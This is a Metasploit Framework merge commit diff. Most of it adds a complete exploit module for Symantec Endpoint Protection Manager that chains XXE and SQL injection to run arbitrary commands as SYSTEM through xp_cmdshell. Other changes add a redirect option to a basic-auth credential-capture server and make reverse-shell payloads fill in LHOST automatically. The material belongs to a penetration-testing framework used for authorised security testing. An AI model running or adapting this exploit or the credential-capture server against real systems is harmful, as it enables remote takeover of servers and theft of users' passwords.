Merge branch 'master' of github.com:rapid7/metasploit-framework

2014-02-25 15:56:24 -06:00 · 2014-02-25 15:56:24 -06:00 · f229932d16
parent f51cbfffb8 63bbe7bef2
commit f229932d16
7 changed files with 146 additions and 7 deletions
--- a/modules/auxiliary/admin/natpmp/natpmp_map.rb
+++ b/modules/auxiliary/admin/natpmp/natpmp_map.rb
@ -101,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary
    )

    # report the external port as being open
-    if inside_workspace_boundary(external_address)
+    if inside_workspace_boundary?(external_address)
      report_service(
        :host   => external_address,
        :port   => external_port,
--- a/modules/auxiliary/gather/natpmp_external_address.rb
+++ b/modules/auxiliary/gather/natpmp_external_address.rb
@ -70,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary
    )

    # also report its external address as alive
-    if inside_workspace_boundary(external_address)
+    if inside_workspace_boundary?(external_address)
      report_host(
        :host   => external_address,
        :state => Msf::HostState::Alive
--- a/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb
+++ b/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb
@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary
      print_status("#{external_addr} - #{int}/#{protocol} #{state} because of code #{result} response") if (datastore['DEBUG'])
    end

-    if inside_workspace_boundary(external_addr)
+    if inside_workspace_boundary?(external_addr)
      report_service(
        :host   => external_addr,
        :port   => int,
--- a/modules/auxiliary/server/capture/http_basic.rb
+++ b/modules/auxiliary/server/capture/http_basic.rb
@ -39,7 +39,8 @@ class Metasploit3 < Msf::Auxiliary
    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The local port to listen on.", 80 ]),
-        OptString.new('REALM', [ true, "The authentication realm you'd like to present.", "Secure Site" ])
+        OptString.new('REALM', [ true, "The authentication realm you'd like to present.", "Secure Site" ]),
+        OptString.new('RedirectURL', [ false, "The page to redirect users to after they enter basic auth creds" ])
      ], self.class)
  end

@ -73,9 +74,14 @@ class Metasploit3 < Msf::Auxiliary
      )

      print_good("#{cli.peerhost} - Credential collected: \"#{user}:#{pass}\" => #{req.resource}")
-      send_not_found(cli)
+      if datastore['RedirectURL']
+        print_status("Redirecting client #{cli.peerhost} to #{datastore['RedirectURL']}")
+        send_redirect(cli, datastore['RedirectURL'])
+      else
+        send_not_found(cli)
+      end
    else
-      print_status("Sending 401 to client")
+      print_status("Sending 401 to client #{cli.peerhost}")
      response = create_response(401, "Unauthorized")
      response.headers['WWW-Authenticate'] = "Basic realm=\"#{@realm}\""
      cli.send_response(response)
--- a/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb
+++ b/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb
@ -0,0 +1,124 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/powershell'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include REXML
+  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Symantec Endpoint Protection Manager Remote Command Execution',
+      'Description'    => %q{
+        This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager
+        versions 11.0, 12.0 and 12.1. When supplying a specially crafted XXE request an attacker
+        can reach SQL injection affected components. As xp_cmdshell is enabled in the included
+        database instance, it's possible to execute arbitrary system commands on the remote system
+        with SYSTEM privileges.
+      },
+      'Author'         =>
+        [
+          'Stefan Viehbock', # Discovery
+          'Chris Graham', # PoC exploit
+          'xistence <xistence[at]0x90.nl>' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2013-5014' ],
+          [ 'CVE', '2013-5015' ],
+          [ 'EDB', '31853'],
+          [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ]
+        ],
+      'Arch'           => ARCH_X86,
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          ['Windows VBS Stager', {}]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Feb 24 2014',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        Opt::RPORT(9090),
+        OptString.new('TARGETURI', [true, 'The base path', '/'])
+      ], self.class)
+  end
+
+  def check
+    res = send_request_cgi(
+      {
+        'uri'   =>  normalize_uri(target_uri.path),
+        'method' => 'GET',
+      })
+
+    if res && res.code == 200 && res.body =~ /Symantec Endpoint Protection Manager/ && res.body =~ /1995 - 2013 Symantec Corporation/
+      return Exploit::CheckCode::Appears
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    print_status("#{peer} - Sending payload")
+    # Execute the cmdstager, max length of the commands is ~3950
+    execute_cmdstager({:linemax => 3950})
+  end
+
+  def execute_command(cmd, opts = {})
+    # Convert the command data to hex, so we can use that in the xp_cmdshell. Else characters like '>' will be harder to bypass in the XML.
+    command = "0x#{Rex::Text.to_hex("cmd /c #{cmd}", '')}"
+
+    # Generate random 'xx032xxxx' sequence number.
+    seqnum = "#{rand_text_numeric(2)}032#{rand_text_numeric(4)}"
+
+    soap = soap_request(seqnum, command)
+
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(soap, "text/xml", nil, "form-data; name=\"Content\"")
+    xxe = post_data.to_s
+
+    res = send_request_cgi(
+      {
+        'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
+        'method' => 'POST',
+        'vars_get' => { 'ActionType' => 'ConsoleLog' },
+        'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
+        'data' => xxe,
+      })
+
+    if res and res.body !~ /ResponseCode/
+      fail_with(Failure::Unknown, "#{peer} - Something went wrong.")
+    end
+  end
+
+  def soap_request(seqnum, command)
+    randpayload = rand_text_alpha(8+rand(8))
+    randxxe = rand_text_alpha(8+rand(8))
+    entity = "<!ENTITY #{randpayload} SYSTEM \"http://127.0.0.1:9090/servlet/ConsoleServlet?"
+    entity << "ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\" >"
+
+    xml = Document.new
+    xml.add(DocType.new('sepm', "[ METASPLOIT ]"))
+    xml.add_element("Request")
+    xxe = xml.root.add_element(randxxe)
+    xxe.text = "PAYLOAD"
+
+    xml_s = xml.to_s
+    xml_s.gsub!(/METASPLOIT/, entity) # To avoid html encoding
+    xml_s.gsub!(/PAYLOAD/, "&#{randpayload};") # To avoid html encoding
+
+    xml_s
+  end
+
+end
+
--- a/8
+++ b/8
@ -114,9 +114,15 @@ cmd = rest.pop.downcase
 options = {}
 rest.each do |x|
  k,v = x.split("=", 2)
-  options[k] = v.to_s
+  options[k.upcase] = v.to_s
 end

+# if LHOST is not set auto set it
+if payload_name =~ /[\_\/]reverse/ and options['LHOST'].nil?
+  options['LHOST'] = Rex::Socket.source_address
+end
+
+
 payload.datastore.merge! options

 if (cmd =~ /^(p|y|r|d|c|h|j|x|b|v|w|n)$/)
--- a/3
+++ b/3
@ -152,6 +152,9 @@ require 'msf/core/payload_generator'
        k,v = x.split('=', 2)
        datastore[k.upcase] = v.to_s
      end
+      if opts[:payload].to_s =~ /[\_\/]reverse/ and datastore['LHOST'].nil?
+        datastore['LHOST'] = Rex::Socket.source_address
+      end
    end

    if opts[:payload].nil? # if no payload option is selected assume we are reading it from stdin